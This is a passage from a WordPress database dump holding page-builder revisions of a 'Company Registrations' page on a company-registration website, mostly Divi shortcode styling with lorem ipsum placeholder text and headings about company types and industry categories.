border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Private Company + Customized MOI\" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Personal Liability Comapny\" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Process\" _builder_version=\"3.22\" locked=\"off\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>We Build For the All of the Biggest Product Categories</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\" column_structure=\"1_5,1_5,1_5,1_5,1_5\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Healthcare</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Food &amp; Drink</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>ECommerce</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Gaming </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Event </h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\" column_structure=\"1_5,1_5,1_5,1_5,1_5\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Sports &amp; Fitness </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Real Estate </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>productivity </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Hospitality </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Education </h3>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_style=\"wave\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>A Proven Process Time &amp; Time Again</h2>\n<p>Vivamus suscipit tortor eget felis porttitor volutpat. Vivamus suscipit tortor eget felis porttitor volutpat. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Praesent sapien</p>[/et_pb_text][et_pb_button button_text=\"Online Project Application\" _builder_version=\"3.19.6\" custom_button=\"on\" button_text_size=\"12px\" button_text_color=\"#ffffff\" button_bg_color=\"#1ca5ff\" button_border_width=\"0px\" button_border_radius=\"100px\" button_letter_spacing=\"1px\" button_font=\"Poppins|600||on|||||\" button_icon=\"%%190%%\" button_on_hover=\"off\" box_shadow_style=\"preset3\" box_shadow_vertical=\"30px\" box_shadow_blur=\"40px\" box_shadow_spread=\"-16px\" box_shadow_color=\"rgba(28,165,255,0.24)\" custom_padding=\"14px|58px|14px|40px|true|false\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]','Company Registrations','','inherit','closed','closed','','32664-revision-v1','','','2019-08-13 10:54:17','2019-08-13 08:54:17','',32664,'https://companyregistration.online/32664-revision-v1/',0,'revision','',0),(32671,3,'2019-08-13 10:46:58','2019-08-13 08:46:58','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\"]<h1>Company Registrations</h1>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"18px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"16px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\"]<p>Select the type of company that best suits your needs</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Why Choosing The Right Company Is Important?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictum porta. Proin eget tortor risus. </p>\n<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictu</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Personal Liability Company\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Private Company With Customized MOI \" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Private Company\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row _builder_version=\"3.25\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Private Company\" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover.jpg\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Private Company + Customized MOI\" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Personal Liability Comapny\" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Process\" _builder_version=\"3.22\" locked=\"off\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>We Build For the All of the Biggest Product Categories</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\" column_structure=\"1_5,1_5,1_5,1_5,1_5\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Healthcare</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Food &amp; Drink</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" 